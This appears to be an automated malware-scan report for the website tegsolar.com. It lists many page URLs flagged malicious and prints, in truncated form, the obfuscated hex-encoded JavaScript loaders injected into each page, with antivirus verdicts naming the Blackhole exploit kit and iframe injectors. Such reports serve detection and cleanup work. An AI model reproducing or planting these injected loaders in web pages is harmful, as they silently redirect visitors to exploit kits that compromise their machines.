Request | Server response | Status |
http://www.tegsolar.com/ | 200 OK Content-Length: 9813 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_g.js | 200 OK Content-Length: 5503 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) bidub="y";miu="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[miu].getElementById("asd"))==null}()}catch(toe){sfv=function(sczgj){sczgj="fr"+"omCh"+sczgj;for(uugx=0;uugx<bidub.length;uugx++){aqkk+=String[sczgj](bkgnn(etyt+(bidub[uugx]))-(83));}};};bkgnn=(window.eval);etyt="0x";jxefy=0;try{;}catch(ochmrn){jxefy=1}if(!jxefy){try{++bkgnn(miu)["\x62o"+"d"+bidub]}catch(toe){mkmmoz="^";}bidub="73^b9^c8^c1^b6^c7^bc^c2^c1^73^b8^b6^b9^c8^b4^83^8c^7b^7c^73^ce^60^5d^73^c9^b4^c
... 3779 bytes are skipped ...bf^b8^c1^7f^73^b8^c1^b7^73^7c^73^7c^8e^60^5d^d0^60^5d^bc^b9^73^7b^c1^b4^c9^bc^ba^b4^c7^c2^c5^81^b6^c2^c2^be^bc^b8^98^c1^b4^b5^bf^b8^b7^7c^60^5d^ce^60^5d^bc^b9^7b^9a^b8^c7^96^c2^c2^be^bc^b8^7b^7a^c9^bc^c6^bc^c7^b8^b7^b2^c8^c4^7a^7c^90^90^88^88^7c^ce^d0^b8^bf^c6^b8^ce^a6^b8^c7^96^c2^c2^be^bc^b8^7b^7a^c9^bc^c6^bc^c7^b8^b7^b2^c8^c4^7a^7f^73^7a^88^88^7a^7f^73^7a^84^7a^7f^73^7a^82^7a^7c^8e^60^5d^60^5d^b8^b6^b9^c8^b4^83^8c^7b^7c^8e^60^5d^d0^60^5d^d0".split(mkmmoz);aqkk="";sfv("arCode");bkgnn(""+aqkk);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://www.tegsolar.com/index.html | 200 OK Content-Length: 9813 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_003.htm | 200 OK Content-Length: 11440 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_007.htm | 200 OK Content-Length: 10900 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_004.htm | 200 OK Content-Length: 9852 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_002.htm | 200 OK Content-Length: 9986 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_010.htm | 200 OK Content-Length: 9424 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_009.htm | 200 OK Content-Length: 10676 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_008.htm | 200 OK Content-Length: 10359 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_006.htm | 200 OK Content-Length: 10540 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
